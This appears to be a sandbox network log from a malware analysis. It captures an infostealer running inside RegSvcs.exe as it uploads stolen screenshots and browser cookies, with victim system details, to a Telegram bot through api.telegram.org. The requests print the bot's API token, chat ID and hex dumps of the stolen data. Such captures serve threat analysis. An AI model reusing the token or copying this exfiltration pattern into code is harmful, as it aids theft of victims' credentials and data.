2022-04-08 10:14:47 UTC	2250	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da198966b6e37b Host: api.telegram.org Content-Length: 116893 Expect: 100-continue Connection: Keep-Alive
2022-04-08 10:14:47 UTC	2250	IN	HTTP/1.1 100 Continue
2022-04-08 10:14:47 UTC	2250	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 38 39 36 36 62 36 65 33 37 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 38 39 36 36 62 36 65 33 37 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 63 72 65 65 6e 73 68 6f 74 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 30 38 32 35 36 Data Ascii: -----------------------------8da198966b6e37bContent-Disposition: form-data; name="chat_id"5019146869-----------------------------8da198966b6e37bContent-Disposition: form-data; name="caption"New Screenshot Recovered!User Name: user/08256
2022-04-08 10:14:47 UTC	2251	OUT	Data Raw: 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ec 2e af 8c 4a cf bd 22 8c 36 cd cd 19 7c 91 d7 80 46 07 6a 85 2f a4 96 f0 da 47 77 03 4c 06 e2 05 b3 10 07 ae 77 e3 bd 55 d4 6e 85 b6 97 2b 6d 0e cd 24 aa aa 7b 9f 31 a9 ba 03 c3 81 b5 55 25 b8 db 21 23 f8 b1 d4 7e 1c fe b5 8f 3f bd 63 2e 6d 6c 6b da dd 19 6d 2d 25 75 f9 ae 11 4f cb d0 12 bb bf 2e 29 d7 77 22 d6 1f 30 ae ee 7a 67 1d 89 fe 95 57 4e 39 Data Ascii: 4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?.J"6\|Fj/GwLwUn+m${1U%!#~?c.mlkm-%uO.)w"0zgWN9
2022-04-08 10:14:47 UTC	2267	OUT	Data Raw: da 5b a5 b5 d8 57 44 07 13 3d db 4d 23 12 73 ce 51 7d 7f 41 5a 07 fd 62 9f 63 fd 28 cd 14 80 a1 aa 42 b3 bc 48 e2 6c 00 5b f7 52 04 3c 32 f7 c8 e3 fc fb d6 34 96 f7 12 ea b1 dc 03 2b a5 b6 e0 a8 5c 64 2b 80 31 bb 7f 5f 94 f3 d7 d6 ba 39 ed ad ee 54 0b 88 23 94 0e 40 91 03 63 f3 a8 7f b2 f4 ef f9 f0 b5 ff 00 bf 2b fe 15 49 a1 6a 67 e8 11 18 af af c1 59 01 65 46 fd e4 9b cf 2c e7 ae 4f 15 1a 69 57 43 4c 36 de 58 da 60 2c 53 70 ff 00 5b b7 6e 3e 9d 0f d4 56 d4 16 b6 d6 bb be cf 6f 14 3b be f7 96 81 73 f5 c5 4b 9a 4f 56 35 a1 90 96 13 7f 6c 8b 89 56 62 14 2f 96 e8 63 da a0 2e 0a 9c fc dd 73 d3 8e 6a ac b6 f1 69 da 7d 87 da e0 8b cb 45 6f 36 26 74 52 64 c0 c3 72 40 24 60 8e 0e 79 e2 ba 1c d1 9a 4c 11 cf c1 a7 4f 22 e9 ad 2c 73 f9 71 c0 80 79 7b 33 1b 03 92 4e Data Ascii: [WD=M#sQ}AZbc(BHl[R<24+\d+1_9T#@c+IjgYeF,OiWCL6X`,Sp[n>Vo;sKOV5lVb/c.sji}Eo6&tRdr@$`yLO",sqy{3N
2022-04-08 10:14:47 UTC	2283	OUT	Data Raw: bf 4f f0 a3 69 fe fb 7e 9f e1 40 0f a6 47 f7 4f d4 ff 00 3a 36 9f ef b7 e9 fe 14 d4 53 b7 ef b7 53 e9 eb 40 12 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f Data Ascii: Oi~@GO:6SS@LQ}OLQ}OLQ}O#Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?
2022-04-08 10:14:47 UTC	2299	OUT	Data Raw: 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d3 23 fb a7 ea 7f 9d 1b c7 a3 7f df 26 9a 8e 02 f4 6e a7 f8 4f ad 00 4b 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 Data Ascii: M&Lto\|j8>-FL=4o\|}F#&nOKE3xoz7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7F
2022-04-08 10:14:47 UTC	2314	OUT	Data Raw: fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e fb 75 3e 9e b4 01 2d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 32 3f ba 7e a7 f9 d1 b4 ff 00 7d bf 4f f0 a6 a2 9d bf 7d ba 9f 4f 5a 00 96 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 99 1f dd 3f 53 fc e8 da 7f be df a7 f8 53 51 4e df be dd 4f a7 ad 00 4b Data Ascii: F?v}=hZ)O6)O6)O6dtOi~ME;~u>-O}O}O}2?~}O}OZf?>f?>f?>?SSQNOK
2022-04-08 10:14:47 UTC	2330	OUT	Data Raw: e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 Data Ascii: z7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7FM&E3xoz7hS7FM&Lto\|j8>-FL=4o\|}F
2022-04-08 10:14:47 UTC	2346	OUT	Data Raw: 45 14 00 53 23 fb a7 ea 7f 9d 3e 99 1f dd 3f 53 fc e8 01 f4 51 45 00 14 51 45 00 14 51 45 00 14 c8 fe e9 fa 9f e7 4f a6 47 f7 4f d4 ff 00 3a 00 7d 14 51 40 05 14 51 40 05 14 51 40 05 32 3f ba 7e a7 f9 d3 e9 91 fd d3 f5 3f ce 80 1f 55 67 ff 00 8f d8 7f eb 9b ff 00 35 ab 55 56 7f f8 fd 87 fe b9 bf f3 5a 00 6b d5 3b 7f f9 08 3f fc 0b f9 47 57 1e a9 db ff 00 c8 41 ff 00 e0 5f ca 3a a1 13 6c 6f f9 ea ff 00 90 ff 00 0a 36 37 fc f5 7f c8 7f 85 67 eb 1e 64 71 99 a3 33 a9 50 0e f5 93 09 1e 0f 25 94 1c b7 1d b0 7a 76 a4 be 2f 15 dc 13 2b 4e aa d2 26 e9 0c 9f bb 0a 78 db b4 1e fe a4 77 eb 48 0d 1d 8d ff 00 3d 5f f2 1f e1 56 6d 14 fd 9c 7c ed f7 9b d3 d4 fb 57 3f 6f 73 2b 5d 24 f3 a3 94 92 e1 a2 42 b3 b0 db 82 40 05 3a 76 eb c9 e6 ba 2b 3f f8 f7 1f ef 37 fe 84 68 e8 Data Ascii: ES#>?SQEQEQEOGO:}Q@Q@Q@2?~?Ug5UVZk;?GWA_:lo67gdq3P%zv/+N&xwH=_Vm\|W?os+]$B@:v+?7h
2022-04-08 10:14:47 UTC	2362	OUT	Data Raw: d4 94 da 23 b9 3f b8 ff 00 81 a7 fe 86 2a 36 fb d2 ff 00 be bf c9 69 6e 0f ee 0f fb e9 ff 00 a1 ad 34 fd e9 7f de 5f e4 b5 e9 1c 05 dd 1c ed d3 94 7f d3 59 bf f4 6b d5 8b b9 0a 59 cc ea 79 58 d8 8f ca aa e9 df 2d 92 0f f6 e4 ff 00 d1 8d 4e be 7c 58 5c 7f d7 26 fe 55 94 96 8c bb e8 37 50 b6 92 44 09 6c ee 8d 17 0a aa c4 64 0e d5 91 79 35 ed e5 c5 ad bc 2c f0 ae dc c9 2a 12 3a 75 27 1e df 99 ad 0d 62 fd ed 62 b8 10 9c 4c e4 a2 11 fc 23 b9 aa 1a 4d cc 96 b6 50 dc 09 3c cd 87 64 9c 11 8f 6f 7e 31 cd 72 49 f2 ca eb e6 64 da b9 78 5e 44 14 2c 79 65 51 80 58 e4 9f af bd 3a 19 37 ea 4a dd 33 6c bf fa 1b d5 b9 a2 b4 bd 89 66 7b 71 28 71 90 f1 70 f8 fe 75 59 2c a3 b6 9a 39 a3 9e 49 16 44 d8 a9 22 e0 a8 04 9f e6 de 95 b4 13 e6 1a 4d 32 e6 ea a9 7a 73 3c 1f ee c9 fc Data Ascii: #?6in4_YkYyX-N\|X\&U7PDldy5,:u'bbL#MP<do~1rIdx^D,yeQX:7J3lf{q(qpuY,9ID"M2zs<
2022-04-08 10:14:47 UTC	2364	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 38 39 36 36 62 36 65 33 37 62 2d 2d 0d 0a Data Ascii: -----------------------------8da198966b6e37b--
2022-04-08 10:14:48 UTC	2364	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:14:48 GMT Content-Type: application/json Content-Length: 828 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":140,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412888,"document":{"file_name":"user-082561 2022-04-08 05-58-35.jpeg","mime_type":"image/jpeg","thumb":{"file_id":"AAMCBAADGQMAA4xiUAsYsex2roK8wXOhoCMdIO4F3wADCwACQJSAUrajmhdjhTJFAQAHbQADIwQ","file_unique_id":"AQAECwACQJSAUnI","file_size":14417,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAOMYlALGLHsdq6CvMFzoaAjHSDuBd8AAwsAAkCUgFK2o5oXY4UyRSME","file_unique_id":"AgAECwACQJSAUg","file_size":116305},"caption":"New Screenshot Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49173	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:13:12 UTC	537	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da195d3e2a38cb Host: api.telegram.org Content-Length: 5245 Expect: 100-continue
2022-04-08 10:13:12 UTC	537	IN	HTTP/1.1 100 Continue
2022-04-08 10:13:12 UTC	537	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 35 64 33 65 32 61 33 38 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 35 64 33 65 32 61 33 38 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 43 6f 6f 6b 69 65 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 30 38 32 35 36 31 0a 4f 53 Data Ascii: -----------------------------8da195d3e2a38cbContent-Disposition: form-data; name="chat_id"5019146869-----------------------------8da195d3e2a38cbContent-Disposition: form-data; name="caption"New Cookie Recovered!User Name: user/082561OS
2022-04-08 10:13:12 UTC	538	OUT	Data Raw: 4e 3c b6 2a 97 a2 6c 56 8b 79 d9 f8 4a 33 4e 8f 12 37 1a 09 f2 09 17 ce c5 49 83 b3 e7 71 95 58 8c 6a be 32 25 5e 8f 29 98 4e 6c 84 9d 34 91 14 61 a1 9e d6 d0 66 37 59 ed 26 6a fc 50 46 b5 21 2c 46 fb 32 1b 45 64 19 1e 84 26 2a 3e 21 ea 61 75 40 80 9c a4 63 48 32 6b df 27 5e 23 48 21 c7 48 ab c3 6e 24 0c a4 31 97 28 78 4a d3 50 79 8a 56 93 94 a2 c2 64 23 77 4c 8e 31 37 49 8e 31 f7 20 30 30 9b e5 e2 eb ed cd 5a 1d 32 9c 17 05 04 85 33 07 fb 91 8c 60 4a 64 cc bd 8e 4f d0 c6 a6 2a 75 d1 6a e5 a8 9e 9c d7 4f d4 69 16 28 75 69 d8 2b aa 34 39 f6 60 62 a3 9a 07 06 b0 f9 be 91 de 4f ca 67 a6 07 83 82 79 e5 d0 c9 2a 60 32 96 59 d4 73 d0 63 08 fa 1d 7a 0c 3d f3 0b 3c 71 00 00 00 00 00 00 00 00 00 78 76 93 47 4e dc 05 1c 89 78 29 b3 6d 62 b5 28 66 f8 0b 39 91 e2 e1 Data Ascii: N<lVyJ3N7IqXj2%^)Nl4af7Y&jPF!,F2Ed&>!au@cH2k'^#H!Hn$1(xJPyVd#wL17I1 00Z23`JdOujOi(ui+49`bOgy`2Yscz=<qxvGNx)mb(f9
2022-04-08 10:13:12 UTC	542	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 35 64 33 65 32 61 33 38 63 62 2d 2d 0d 0a Data Ascii: -----------------------------8da195d3e2a38cb--
2022-04-08 10:13:12 UTC	542	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:13:12 GMT Content-Type: application/json Content-Length: 653 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":123,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412792,"document":{"file_name":"user-082561 2022-04-08 12-41-59.zip","mime_type":"application/zip","file_id":"BQACAgQAAxkDAAN7YlAKuKlCxDiRzEQT0MfbcY1KDbcAAu8KAAJAlIBSnYO0Nzu7YHYjBA","file_unique_id":"AgAD7woAAkCUgFI","file_size":4657},"caption":"New Cookie Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.22	49191	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:14:53 UTC	2365	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da198c3235a9de Host: api.telegram.org Content-Length: 116893 Expect: 100-continue Connection: Keep-Alive
2022-04-08 10:14:53 UTC	2366	IN	HTTP/1.1 100 Continue
2022-04-08 10:14:53 UTC	2366	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 38 63 33 32 33 35 61 39 64 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 38 63 33 32 33 35 61 39 64 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 63 72 65 65 6e 73 68 6f 74 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 30 38 32 35 36 Data Ascii: -----------------------------8da198c3235a9deContent-Disposition: form-data; name="chat_id"5019146869-----------------------------8da198c3235a9deContent-Disposition: form-data; name="caption"New Screenshot Recovered!User Name: user/08256
2022-04-08 10:14:53 UTC	2367	OUT	Data Raw: 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ec 2e af 8c 4a cf bd 22 8c 36 cd cd 19 7c 91 d7 80 46 07 6a 85 2f a4 96 f0 da 47 77 03 4c 06 e2 05 b3 10 07 ae 77 e3 bd 55 d4 6e 85 b6 97 2b 6d 0e cd 24 aa aa 7b 9f 31 a9 ba 03 c3 81 b5 55 25 b8 db 21 23 f8 b1 d4 7e 1c fe b5 8f 3f bd 63 2e 6d 6c 6b da dd 19 6d 2d 25 75 f9 ae 11 4f cb d0 12 bb bf 2e 29 d7 77 22 d6 1f 30 ae ee 7a 67 1d 89 fe 95 57 4e 39 Data Ascii: 4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?.J"6\|Fj/GwLwUn+m${1U%!#~?c.mlkm-%uO.)w"0zgWN9
2022-04-08 10:14:53 UTC	2383	OUT	Data Raw: da 5b a5 b5 d8 57 44 07 13 3d db 4d 23 12 73 ce 51 7d 7f 41 5a 07 fd 62 9f 63 fd 28 cd 14 80 a1 aa 42 b3 bc 48 e2 6c 00 5b f7 52 04 3c 32 f7 c8 e3 fc fb d6 34 96 f7 12 ea b1 dc 03 2b a5 b6 e0 a8 5c 64 2b 80 31 bb 7f 5f 94 f3 d7 d6 ba 39 ed ad ee 54 0b 88 23 94 0e 40 91 03 63 f3 a8 7f b2 f4 ef f9 f0 b5 ff 00 bf 2b fe 15 49 a1 6a 67 e8 11 18 af af c1 59 01 65 46 fd e4 9b cf 2c e7 ae 4f 15 1a 69 57 43 4c 36 de 58 da 60 2c 53 70 ff 00 5b b7 6e 3e 9d 0f d4 56 d4 16 b6 d6 bb be cf 6f 14 3b be f7 96 81 73 f5 c5 4b 9a 4f 56 35 a1 90 96 13 7f 6c 8b 89 56 62 14 2f 96 e8 63 da a0 2e 0a 9c fc dd 73 d3 8e 6a ac b6 f1 69 da 7d 87 da e0 8b cb 45 6f 36 26 74 52 64 c0 c3 72 40 24 60 8e 0e 79 e2 ba 1c d1 9a 4c 11 cf c1 a7 4f 22 e9 ad 2c 73 f9 71 c0 80 79 7b 33 1b 03 92 4e Data Ascii: [WD=M#sQ}AZbc(BHl[R<24+\d+1_9T#@c+IjgYeF,OiWCL6X`,Sp[n>Vo;sKOV5lVb/c.sji}Eo6&tRdr@$`yLO",sqy{3N
2022-04-08 10:14:53 UTC	2399	OUT	Data Raw: bf 4f f0 a3 69 fe fb 7e 9f e1 40 0f a6 47 f7 4f d4 ff 00 3a 36 9f ef b7 e9 fe 14 d4 53 b7 ef b7 53 e9 eb 40 12 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f Data Ascii: Oi~@GO:6SS@LQ}OLQ}OLQ}O#Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?
2022-04-08 10:14:53 UTC	2415	OUT	Data Raw: 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d3 23 fb a7 ea 7f 9d 1b c7 a3 7f df 26 9a 8e 02 f4 6e a7 f8 4f ad 00 4b 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 Data Ascii: M&Lto\|j8>-FL=4o\|}F#&nOKE3xoz7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7F
2022-04-08 10:14:53 UTC	2430	OUT	Data Raw: fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e fb 75 3e 9e b4 01 2d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 32 3f ba 7e a7 f9 d1 b4 ff 00 7d bf 4f f0 a6 a2 9d bf 7d ba 9f 4f 5a 00 96 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 99 1f dd 3f 53 fc e8 da 